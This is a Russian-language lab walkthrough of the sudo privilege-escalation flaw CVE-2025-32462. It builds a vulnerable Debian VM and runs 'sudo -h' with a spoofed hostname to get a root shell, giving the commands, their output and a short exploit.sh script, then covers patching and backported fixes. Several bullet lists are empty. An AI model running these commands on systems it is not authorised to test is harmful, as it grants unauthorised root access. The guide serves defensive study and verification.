
CVE-2025-32462 is a local privilege escalation vulnerability in sudo
CVE-2025-32462 – это локальная уязвимость повышения привилегий в sudo, которая позволяет непривилегированному пользователю выполнять команды от root путем злоупотребления правилами sudo, ограниченными по имени хоста. Проблема заключается в том, как sudo исторически обрабатывал опцию -h (хост) при проверке авторизации.
Когда правило sudoers ограничено конкретным именем хоста, sudo должно разрешать выполнение только при совпадении системного имени хоста с правилом. Из-за ошибочной логики уязвимые версии доверяли указанному пользователем имени хоста через sudo -h, что позволяло атакующим полностью обойти ограничение.
sudo позволял аргументу -h <имя_хоста> влиять на решения об авторизации. В уязвимых версиях указанное имя хоста считалось доверенным при оценке правил sudoers, вместо строгой проверки на соответствие реальному имени хоста системы.
В результате ограничения sudo на основе имени хоста могли быть обойдены.
При успешной эксплуатации локальный атакующий может:
В реальных средах эта уязвимость особенно опасна в:
| Компонент | Детали |
|---|---|
| ОС | Debian 11 (Bullseye – без патча) |
| Версия sudo | ≤ 1.9.13 |
| Уровень доступа | Локальный пользователь |
| Виртуализация | VirtualBox |
⚠️ Примечание: Современные версии Ubuntu и Debian содержат обратно портированные исправления при сохранении похожих строк версий. Данная уязвимость не может быть воспроизведена на исправленных системах.
sudo --version
Ожидаемый вывод (уязвимая версия):
Sudo version 1.9.5p2
sudo useradd -m attacker
sudo passwd attacker
groups attacker
Ожидаемый вывод:
attacker : attacker
Пользователь не должен принадлежать к группе sudo.
Отредактируйте sudoers безопасным способом:
sudo visudo
Добавьте следующую строку:
attacker prod-server = (root) ALL
prod-server – ложное имя хостаПроверьте:
sudo -l -U attacker
Ожидаемый вывод:
User attacker may run the following commands on prod-server:
(root) ALL
Переключитесь на пользователя:
su - attacker
Попробуйте выполнить sudo обычным способом:
sudo id
Ожидаемый вывод:
attacker is not allowed to run sudo on <hostname>
Запустите уязвимость:
sudo -h prod-server id
Вывод при успешной эксплуатации:
uid=0(root) gid=0(root) groups=0(root)
Запустите оболочку root:
sudo -h prod-server /bin/bash
Проверьте:
id
#!/bin/bash
echo "[*] Attempting CVE-2025-32462 exploitation"
sudo -h prod-server id
Сохраните как exploit.sh, сделайте исполняемым и запустите от пользователя attacker:
chmod +x exploit.sh
./exploit.sh
| Действие | Результат |
|---|---|
| Обычный sudo | ❌ Отказ |
sudo -h prod-server id | ✅ Root |
Это подтверждает успешное повышение привилегий.
Современные версии Ubuntu поставляются с версиями sudo, попадающими в уязвимый диапазон. Однако Ubuntu обратно портировала исправление безопасности для CVE-2025-32462 без изменения номера версии из апстрима.
В результате:
sudo -h больше не влияет на проверки авторизацииЭто подчёркивает важность проверки статуса уязвимости с помощью поведенческого тестирования, а не только по строкам версий.
sudo до исправленной версииДанное руководство предназначено только для образовательных целей и защитных исследований безопасности. Не тестируйте эту уязвимость на системах, которыми вы не владеете или на которые не имеете явного разрешения.